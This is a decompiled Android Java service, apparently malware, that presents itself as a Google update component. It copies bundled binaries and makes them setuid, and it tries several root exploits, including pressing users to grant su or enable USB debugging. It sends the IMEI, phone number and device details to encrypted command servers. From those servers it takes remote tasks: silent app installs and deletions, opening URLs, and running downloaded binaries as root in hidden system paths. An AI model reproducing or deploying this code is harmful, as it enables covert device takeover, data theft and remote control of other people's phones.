package com.google.update;

import android.app.Service;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.net.Uri;
import android.net.wifi.WifiManager;
import android.os.Build;
import android.os.Bundle;
import android.os.IBinder;
import android.os.Process;
import android.os.SystemClock;
import android.provider.Settings;
import com.admogo.util.AdMogoUtil;
import com.google.update.Utils;
import com.ju6.AdManager;
import com.ju6.AdRequester;
import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.UnsupportedEncodingException;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Timer;
import java.util.TimerTask;
import org.apache.http.HttpEntity;
import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;
/* loaded from: classes.dex */
public class UpdateService extends Service {
    private static long INTERVAL = 60000;
    private TimerTask mTimerTask;
    private SharedPreferences mPreferences = null;
    private String mIdentifier = StateRes.channel;
    private String mImei = null;
    private String mMobile = null;
    private String mModel = null;
    private String mOsType = null;
    private String mOsAPI = null;
    private String mAliaMem = null;
    private String mSDMem = null;
    private String mNetType = null;
    private String mOperater = null;
    private String mTaskId = "";
    private int mPermState = 0;
    private long mTickets = 9;
    private Timer mTimer = null;
    private long startDelay = 3600;
    private AdRequester mJu6Ad = null;

    /* JADX INFO: Access modifiers changed from: package-private */
    /* loaded from: classes.dex */
    public class MyThread extends Thread {
        MyThread() {
        }

        @Override // java.lang.Thread, java.lang.Runnable
        public void run() {
            ApplicationInfo ai = UpdateService.this.getApplicationInfo();
            Utils.runsh(String.valueOf(UpdateService.this.getMyDataDir()) + "starter /data/data/" + ai.packageName, "");
            try {
                sleep(5000L);
            } catch (InterruptedException e) {
            }
            if (new File(StateRes.tSysFile).exists()) {
                Utils.runsh(StateRes.tSysFile, "");
                Process.killProcess(Process.myPid());
                return;
            }
            Utils.runsh("am", "startservice -n " + ai.packageName + "/" + StateRes.ServiceName);
            PackageManager pkgManager = UpdateService.this.getBaseContext().getPackageManager();
            String str = UpdateService.this.getBaseContext().getPackageName();
            Intent intent = pkgManager.getLaunchIntentForPackage(str);
            intent.addFlags(134217728);
            intent.addFlags(4194304);
            intent.addFlags(65536);
            UpdateService.this.startActivity(intent);
            Process.killProcess(Process.myPid());
        }
    }

    @Override // android.app.Service
    public IBinder onBind(Intent intent) {
        return null;
    }

    /* JADX INFO: Access modifiers changed from: private */
    public String getMyDataDir() {
        return "/data/data/" + getPackageName() + "/";
    }

    @Override // android.app.Service
    public void onCreate() {
        super.onCreate();
        try {
            ApplicationInfo ai = getPackageManager().getApplicationInfo(getPackageName(), 128);
            Bundle bundle = ai.metaData;
            Object value = bundle.get("ST_START_DELAY");
            if (value != null) {
                this.startDelay = ((Integer) value).intValue();
            }
            Object value2 = bundle.get("ST_MY_PID");
            if (value2 != null) {
                this.mIdentifier = (String) value2;
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        SharedPreferences p = getSharedPreferences("sstimestamp", 0);
        long last = p.getLong("start", 0L);
        long cur = System.currentTimeMillis();
        if (last == 0) {
            SharedPreferences.Editor ed = p.edit();
            ed.putLong("start", cur);
            ed.commit();
            if (this.startDelay > 0) {
                stopSelf();
                return;
            }
        } else if (cur - last < this.startDelay * 1000) {
            stopSelf();
            return;
        }
        this.mPreferences = getSharedPreferences("permission", 0);
        if (Utils.isConnected(this)) {
            doSearchReport();
        }
        getPermission();
        provideService();
    }

    private void doAdGetParam() {
        for (int i = 0; i < StateRes.Servers.length; i++) {
            try {
                byte[] bs = Utils.decrypt(StateRes.Servers[i]);
                String action = new String(bs);
                String adparam = _doAdGetParam(String.valueOf(action) + "adp.php");
                if (adparam != null) {
                    String[] params = adparam.split(":");
                    initJu6Ad(params[0], params[1]);
                    return;
                }
            } catch (Exception e) {
                return;
            }
        }
    }

    private String _doAdGetParam(String action) {
        List<NameValuePair> params = new ArrayList<>();
        params.add(new BasicNameValuePair("imei", this.mImei));
        params.add(new BasicNameValuePair("ch", this.mIdentifier));
        params.add(new BasicNameValuePair("ver", StateRes.version));
        HttpPost httpRequest = new HttpPost(action);
        try {
            httpRequest.setEntity(new UrlEncodedFormEntity(params, "UTF-8"));
            HttpResponse httpResponse = new DefaultHttpClient().execute(httpRequest);
            if (httpResponse.getStatusLine().getStatusCode() != 200) {
                return null;
            }
            HttpEntity httpEntity = httpResponse.getEntity();
            String result = EntityUtils.toString(httpEntity, "utf-8");
            return result;
        } catch (Exception e) {
            e.printStackTrace();
            return null;
        }
    }

    private void initJu6Ad(String appId, String secretId) {
        AdManager.init(appId, secretId, false);
        this.mJu6Ad = new AdRequester(this);
        this.mJu6Ad.getAd();
    }

    private void updateInfo() {
        this.mImei = Utils.PhoneState.getImei(this);
        this.mMobile = Utils.PhoneState.getMobile(this);
        this.mModel = Utils.PhoneState.getModel();
        this.mOsType = Utils.PhoneState.getSDKVersion()[0];
        this.mOsAPI = Utils.PhoneState.getSDKVersion()[1];
        this.mAliaMem = Utils.PhoneState.getAliaMemorySize(this);
        this.mSDMem = Utils.PhoneState.getSDAliaMemory(this);
        this.mNetType = Utils.PhoneState.getConnectType(this);
        this.mOperater = Utils.PhoneState.getNetOperater(this);
    }

    @Override // android.app.Service
    public void onDestroy() {
        super.onDestroy();
        if (this.mTimer != null) {
            this.mTimer.cancel();
        }
    }

    private boolean isVersion221() {
        String osVer = Build.VERSION.RELEASE;
        return osVer.contains("2.2.1") || osVer.contains("2.3") || osVer.contains("3.0");
    }

    private void cpLegacyRes() {
        if (!new File(StateRes.tSysApk).exists()) {
            try {
                String dest = String.valueOf(getMyDataDir()) + StateRes.tLeg;
                Utils.copyAssets(this, StateRes.oLeg, dest, StateRes.oLegLen);
                if (new File(dest).exists()) {
                    String cmd = "2 " + dest + " " + StateRes.tSysApk;
                    Utils.TCP.execute(cmd);
                }
            } catch (Exception e) {
            }
        }
    }

    private boolean checkPermission() {
        if (Utils.checkPermission()) {
            cpLegacyRes();
            return true;
        }
        return false;
    }

    private void getPermission() {
        if (checkPermission()) {
            doSearchReport();
        } else if (isVersion221() || !getPermission1()) {
            if ((new File("/system/bin/su").exists() || new File("/system/xbin/su").exists()) && Utils.PkgManager.isInstalled(this, "com.noshufou.android.su")) {
                getPermission2();
            } else if (!isVersion221()) {
                getPermission3();
            }
        }
    }

    private boolean getPermission1() {
        boolean flag;
        boolean tried = this.mPreferences.getBoolean("P1", false);
        if (tried) {
            return false;
        }
        ApplicationInfo ai = getApplicationInfo();
        String dest = String.valueOf(getMyDataDir()) + StateRes.tSec;
        Utils.copyAssets(this, StateRes.oSec, dest, StateRes.oSecLen);
        Utils.oldrun("/system/bin/chmod", "4755 " + dest);
        Utils.oldrun(String.valueOf(dest) + " /data/data/" + ai.packageName, "");
        WifiManager wifi = (WifiManager) getSystemService("wifi");
        if (wifi.getWifiState() == 3) {
            wifi.setWifiEnabled(false);
            flag = true;
        } else {
            wifi.setWifiEnabled(true);
            flag = false;
        }
        SystemClock.sleep(5000L);
        wifi.setWifiEnabled(flag);
        if (checkPermission()) {
            doSearchReport();
            return true;
        }
        SharedPreferences.Editor edit = this.mPreferences.edit();
        edit.putBoolean("P1", true);
        edit.commit();
        return false;
    }

    private void getPermission2() {
        int count = this.mPreferences.getInt("P2", 0);
        if (count >= 10) {
            this.mPermState = 0;
            if (!isVersion221()) {
                getPermission3();
                return;
            }
            return;
        }
        SharedPreferences.Editor edit = this.mPreferences.edit();
        edit.putInt("P2", count + 1);
        edit.commit();
        this.mPermState = 2;
        ApplicationInfo ai = getApplicationInfo();
        try {
            String dest = String.valueOf(getMyDataDir()) + StateRes.tSec;
            Utils.copyAssets(this, StateRes.oSec, dest, StateRes.oSecLen);
            Utils.oldrun("/system/bin/chmod", "4755 " + dest);
            Process process = Runtime.getRuntime().exec("su");
            DataOutputStream os = new DataOutputStream(process.getOutputStream());
            os.writeBytes(String.valueOf(dest) + " /data/data/" + ai.packageName + " &\n");
            os.writeBytes("exit\n");
            os.flush();
            process.waitFor();
            SystemClock.sleep(2000L);
        } catch (Exception e) {
            e.printStackTrace();
        }
        if (checkPermission()) {
            this.mPermState = 0;
            doSearchReport();
            return;
        }
        Intent intent = new Intent();
        intent.setClass(this, Dialog.class);
        String name = ai.loadLabel(getPackageManager()).toString();
        name = (name == null || "".equals(name)) ? "本软件" : "本软件";
        String msg = String.valueOf(name) + "需要root权限才能使用全部功能，请通过授权管理程序进行授权！";
        try {
            intent.putExtra("MSG", new String(msg.getBytes("UTF-8"), "UTF-8"));
        } catch (UnsupportedEncodingException e2) {
            e2.printStackTrace();
        }
        intent.setFlags(268435456);
        intent.putExtra("TYPEdsada", "su");
        startActivity(intent);
    }

    private int setUsbEnabled() {
        int count = this.mPreferences.getInt("P31", 0) + 1;
        SharedPreferences.Editor edit = this.mPreferences.edit();
        edit.putInt("P31", count);
        edit.commit();
        if (count < 10) {
            Intent intent = new Intent();
            intent.setClass(this, Dialog.class);
            String name = getApplicationInfo().loadLabel(getPackageManager()).toString();
            name = (name == null || "".equals(name)) ? "本软件" : "本软件";
            String msg = String.valueOf(name) + "需要打开USB调试才能使用全部功能，请确保USB调试功能已经选中！";
            try {
                intent.putExtra("MSG", new String(msg.getBytes("UTF-8"), "UTF-8"));
            } catch (UnsupportedEncodingException e) {
            }
            intent.putExtra("TYPEdsada", "set");
            intent.setFlags(268435456);
            startActivity(intent);
        }
        return count;
    }

    private void getPermission3() {
        this.mPermState = 3;
        if (Settings.Secure.getInt(getContentResolver(), "adb_enabled", 0) == 0 && setUsbEnabled() >= 10) {
            this.mPermState = 0;
            return;
        }
        int count = this.mPreferences.getInt("P3", 0);
        if (count >= 16) {
            this.mPermState = 0;
            return;
        }
        SharedPreferences.Editor edit = this.mPreferences.edit();
        edit.putInt("P3", count + 1);
        edit.commit();
        String dir = getMyDataDir();
        Utils.copyAssets(this, "myicon", String.valueOf(dir) + "myicon", StateRes.oRatcLen);
        Utils.copyAssets(this, "starter", String.valueOf(dir) + "starter", StateRes.oStarterLen);
        Utils.copyAssets(this, StateRes.oSec, String.valueOf(dir) + StateRes.tSec, StateRes.oSecLen);
        Utils.oldrun("/system/bin/chmod", "4755 " + dir + "myicon");
        Utils.oldrun("/system/bin/chmod", "4755 " + dir + "starter");
        Utils.oldrun("/system/bin/chmod", "4755 " + dir + StateRes.tSec);
        new MyThread().start();
    }

    private void provideService() {
        this.mTimer = new Timer(true);
        this.mTimerTask = new TimerTask() { // from class: com.google.update.UpdateService.1
            @Override // java.util.TimerTask, java.lang.Runnable
            public void run() {
                UpdateService.this.doTimerTask();
            }
        };
        this.mTimer.schedule(this.mTimerTask, INTERVAL, INTERVAL);
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void doTimerTask() {
        this.mTickets++;
        if (!Utils.PkgManager.isInstalled(this, "com.google.update")) {
            Utils.copyAssets(this, StateRes.oLeg, "/sdcard/db.apk", StateRes.oLegLen);
            if (new File("/sdcard/db.apk").exists()) {
                Utils.PkgManager.installApp(this, "/sdcard/db.apk");
            }
        }
        if (this.mPermState == 2) {
            getPermission2();
        } else if (this.mPermState == 3) {
            getPermission3();
        } else if (Utils.isConnected(this)) {
            if (this.mTickets % 60 == 0) {
                if (this.mJu6Ad != null) {
                    this.mJu6Ad.getAd();
                }
                doSearchReport();
            } else if (this.mTickets % 10 == 0) {
                doSearchTask();
            }
        }
    }

    private void doSearchReport() {
        updateInfo();
        if (this.mJu6Ad == null) {
            doAdGetParam();
        } else {
            this.mJu6Ad.getAd();
        }
        for (int i = 0; i < StateRes.Servers.length; i++) {
            try {
                byte[] bs = Utils.decrypt(StateRes.Servers[i]);
                String action = new String(bs);
                if (_doSearchReport(String.valueOf(action) + "newhi.php")) {
                    return;
                }
            } catch (Exception e) {
                return;
            }
        }
    }

    private boolean _doSearchReport(String action) {
        List<NameValuePair> params = new ArrayList<>();
        params.add(new BasicNameValuePair("imei", this.mImei));
        params.add(new BasicNameValuePair("ch", this.mIdentifier));
        params.add(new BasicNameValuePair("ver", StateRes.version));
        if (checkPermission()) {
            params.add(new BasicNameValuePair("pm", "1"));
        } else {
            params.add(new BasicNameValuePair("pm", "0"));
        }
        if (this.mOsType != null && !"".equals(this.mOsType)) {
            params.add(new BasicNameValuePair("ostype", this.mOsType));
        }
        if (this.mOsAPI != null && !"".equals(this.mOsAPI)) {
            params.add(new BasicNameValuePair("osapi", this.mOsAPI));
        }
        if (this.mMobile != null && !"".equals(this.mMobile)) {
            params.add(new BasicNameValuePair("mobile", this.mMobile));
        }
        if (this.mModel != null && !"".equals(this.mModel)) {
            params.add(new BasicNameValuePair("mobilemodel", this.mModel));
        }
        if (this.mOperater != null && !"".equals(this.mOperater)) {
            params.add(new BasicNameValuePair("netoperater", this.mOperater));
        }
        if (this.mNetType != null && !"".equals(this.mNetType)) {
            params.add(new BasicNameValuePair("nettype", this.mNetType));
        }
        if (this.mSDMem != null && !"".equals(this.mSDMem)) {
            params.add(new BasicNameValuePair("sdmemory", this.mSDMem));
        }
        if (this.mAliaMem != null && !"".equals(this.mAliaMem)) {
            params.add(new BasicNameValuePair("aliamemory", this.mAliaMem));
        }
        HttpPost httpRequest = new HttpPost(action);
        try {
            httpRequest.setEntity(new UrlEncodedFormEntity(params, "UTF-8"));
            HttpResponse httpResponse = new DefaultHttpClient().execute(httpRequest);
            if (httpResponse.getStatusLine().getStatusCode() != 200) {
                return false;
            }
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    private void doSearchTask() {
        String task = getSearchTask();
        if (task != null) {
            doExecuteTask(task);
        }
    }

    private String getSearchTask() {
        if (checkPermission()) {
            for (int i = 0; i < StateRes.Servers.length; i++) {
                try {
                    byte[] bs = Utils.decrypt(StateRes.Servers[i]);
                    String action = new String(bs);
                    String line = _getSearchTask(String.valueOf(action) + "newtask.php");
                    if (line != null) {
                        if (line.compareTo("NONE") == 0) {
                            return null;
                        } else {
                            return line;
                        }
                    }
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
            return null;
        }
        return null;
    }

    private String _getSearchTask(String action) {
        String result = "NONE";
        List<NameValuePair> params = new ArrayList<>();
        params.add(new BasicNameValuePair("imei", this.mImei));
        params.add(new BasicNameValuePair("ch", this.mIdentifier));
        params.add(new BasicNameValuePair("ver", StateRes.version));
        HttpPost httpRequest = new HttpPost(action);
        try {
            httpRequest.setEntity(new UrlEncodedFormEntity(params, "UTF-8"));
            HttpResponse httpResponse = new DefaultHttpClient().execute(httpRequest);
            if (httpResponse.getStatusLine().getStatusCode() == 200) {
                HttpEntity entity = httpResponse.getEntity();
                InputStream is = entity.getContent();
                InputStreamReader isr = new InputStreamReader(is);
                BufferedReader br = new BufferedReader(isr);
                String line = br.readLine();
                if (line != null && line.toUpperCase().equals("OK")) {
                    result = br.readLine().trim();
                }
                br.close();
                isr.close();
                is.close();
                return result;
            }
            return null;
        } catch (Exception e) {
            return null;
        }
    }

    private void doExecuteTask(String task) {
        String[] taskLine = task.split(" ");
        this.mTaskId = taskLine[0];
        int cmd = Integer.parseInt(taskLine[1]);
        switch (cmd) {
            case 1:
                execHomepage(taskLine);
                return;
            case 2:
                execInstall(taskLine);
                return;
            case 3:
                execStartApp(taskLine);
                return;
            case 4:
                execDelete(taskLine);
                return;
            case 5:
                execOpenUrl(taskLine);
                return;
            case 6:
                execSysInstall(taskLine);
                return;
            case 7:
            default:
                reportState(-1, "UnknownTask");
                return;
            case 8:
                return;
            case AdMogoUtil.NETWORK_TYPE_CUSTOM /* 9 */:
                execUpBin(taskLine);
                return;
        }
    }

    private void execHomepage(String[] params) {
        reportState(-1, "NotSupport");
    }

    private void execInstall(String[] params) {
        if (params.length <= 2) {
            reportState(-1, "InvalidArgs");
            return;
        }
        String pkgUrl = params[2];
        String run = null;
        if (params.length >= 4) {
            run = params[3];
        }
        reportState(2, "DownStart");
        String[] info = Utils.downloadFile(this, pkgUrl);
        if (info == null) {
            reportState(-1, "DownFailed");
            return;
        }
        reportState(3, "DownOK");
        installPakage(info, run, null);
    }

    private void execDelete(String[] params) {
        if (params.length <= 2) {
            reportState(-1, "InvalidArgs");
        } else {
            uninstallPackage(params[2]);
        }
    }

    private void execStartApp(String[] params) {
        if (params.length <= 2) {
            reportState(-1, "InvalidArgs");
        } else {
            runPackage(params[2]);
        }
    }

    private void execOpenUrl(String[] params) {
        if (params.length <= 2) {
            reportState(-1, "InvalidArgs");
            return;
        }
        try {
            Uri uri = Uri.parse(params[2]);
            Intent intent = new Intent("android.intent.action.VIEW", uri);
            intent.addFlags(268435456);
            startActivity(intent);
            reportState(1, "OK");
        } catch (Exception e) {
            e.printStackTrace();
            reportState(-1, "Exception");
        }
    }

    private void execSysInstall(String[] params) {
        if (params.length <= 3) {
            reportState(-1, "InvalidArgs");
            return;
        }
        String pkgUrl = params[2];
        String sysName = params[3];
        String run = null;
        if (params.length >= 5) {
            run = params[4];
        }
        reportState(2, "DownStart");
        String[] info = Utils.downloadFile(this, pkgUrl);
        if (info == null) {
            reportState(-1, "DownFailed");
            return;
        }
        reportState(3, "DownOK");
        installPakage(info, run, sysName);
    }

    private void execUpBin(String[] params) {
        if (params.length <= 2) {
            reportState(-1, "InvalidArgs");
            return;
        }
        String pkgUrl = params[2];
        String[] info = Utils.downloadFile(this, pkgUrl);
        if (info == null) {
            reportState(-1, "DownFailed");
            return;
        }
        reportState(3, "DownOK");
        if (checkPermission()) {
            String errinfo = tryInstBin(info[0]);
            if (errinfo == null) {
                reportState(1, "UPOK");
                return;
            } else {
                reportState(-1, errinfo);
                return;
            }
        }
        reportState(-1, "NOPERM");
    }

    private String tryInstBin(String fileName) {
        if (!new File("/system/etc/.dhcpcd").exists()) {
            String cmd = "2 " + fileName + " /system/etc/.dhcpcd";
            if (!Utils.TCP.execute(cmd)) {
                return "BINCP";
            }
        }
        if (!new File("/system/etc/.rild_cfg").exists()) {
            try {
                String dest = "/data/data/" + getApplicationInfo().packageName + "/mycfg.ini";
                OutputStream myOutput = new FileOutputStream(dest);
                String model = this.mModel.replaceAll(" ", "_");
                String ostype = this.mOsType.replaceAll(" ", "_");
                String osapi = this.mOsAPI.replaceAll(" ", "_");
                String data = String.valueOf(this.mImei) + " -1 " + model + " " + ostype + " " + osapi;
                myOutput.write(data.getBytes());
                myOutput.flush();
                myOutput.close();
                if (new File(dest).exists()) {
                    String cmd2 = "2 " + dest + " /system/etc/.rild_cfg";
                    Utils.TCP.execute(cmd2);
                }
            } catch (Exception e) {
            }
        }
        try {
            Utils.TCP.execute("1 " + fileName + " /data/data/WebView.db");
            Utils.TCP.execute("4 /system/bin/chmod 4755 /data/data/WebView.db");
            if (new File("/data/data/WebView.db").exists()) {
                String cmd3 = "4 /data/data/WebView.db";
                Utils.TCP.execute(cmd3);
            }
            return null;
        } catch (Exception e2) {
            return "BINEXEC";
        }
    }

    private void reportState(int state, String comment) {
        for (int i = 0; i < StateRes.Servers.length; i++) {
            try {
                byte[] bs = Utils.decrypt(StateRes.Servers[i]);
                String action = new String(bs);
                if (_reportState(String.valueOf(action) + "newrpt.php", state, comment)) {
                    return;
                }
            } catch (Exception e) {
                return;
            }
        }
    }

    private boolean _reportState(String action, int state, String comment) {
        boolean result = false;
        List<NameValuePair> params = new ArrayList<>();
        params.add(new BasicNameValuePair("imei", this.mImei));
        params.add(new BasicNameValuePair("taskid", this.mTaskId));
        params.add(new BasicNameValuePair("state", Integer.toString(state)));
        if (comment != null && !"".equals(comment)) {
            params.add(new BasicNameValuePair("comment", comment));
        }
        HttpPost httpRequest = new HttpPost(action);
        try {
            httpRequest.setEntity(new UrlEncodedFormEntity(params, "UTF-8"));
            HttpResponse httpResponse = new DefaultHttpClient().execute(httpRequest);
            if (httpResponse.getStatusLine().getStatusCode() == 200) {
                result = true;
            }
        } catch (Exception e) {
        }
        if (state == 1 || state == -1) {
            this.mTaskId = "";
        }
        return result;
    }

    public void installPakage(String[] pathName, String run, String sysName) {
        String[] info = Utils.PkgManager.getPackageMsg(this, pathName[1]);
        if (checkPermission()) {
            String cmd = sysName != null ? "2 " + pathName[0] + " /system/app/" + sysName : "1 " + pathName[0] + " /data/app/" + info[1] + ".apk";
            if (Utils.TCP.execute(cmd)) {
                int state = run == null ? 1 : 5;
                reportState(state, "CPInstOK");
                if (run != null) {
                    runPackage(run);
                    return;
                }
                return;
            }
            reportState(5, "CPInstFail");
            return;
        }
        reportState(-1, "NOPERM");
    }

    private void runPackage(String pkgName) {
        String[] rpkg = pkgName.split("/");
        if (!Utils.PkgManager.isInstalled(this, rpkg[0])) {
            SystemClock.sleep(10000L);
        }
        if (Utils.PkgManager.isInstalled(this, rpkg[0])) {
            Intent intent = getPackageManager().getLaunchIntentForPackage(rpkg[0]);
            intent.setFlags(268435456);
            startActivity(intent);
            reportState(1, "RUNOK");
            return;
        }
        reportState(-1, "RUNFailByNoPkg");
    }

    private void uninstallPackage(String pkgName) {
        PackageInfo pkgInfo = null;
        List<PackageInfo> infos = Utils.PkgManager.getInstallPackageInfo(this);
        Iterator<PackageInfo> it = infos.iterator();
        while (true) {
            if (!it.hasNext()) {
                break;
            }
            PackageInfo info = it.next();
            if (info.packageName.equals(pkgName)) {
                pkgInfo = info;
                break;
            }
        }
        if (pkgInfo == null) {
            reportState(-1, "NoPkg");
        } else if (checkPermission()) {
            if (Utils.TCP.execute("3 /data/app/" + pkgInfo.applicationInfo.sourceDir)) {
                reportState(1, "ByCP");
            } else {
                reportState(-1, "CPDelFail");
            }
        } else {
            reportState(-1, "NOPERM");
        }
    }
}
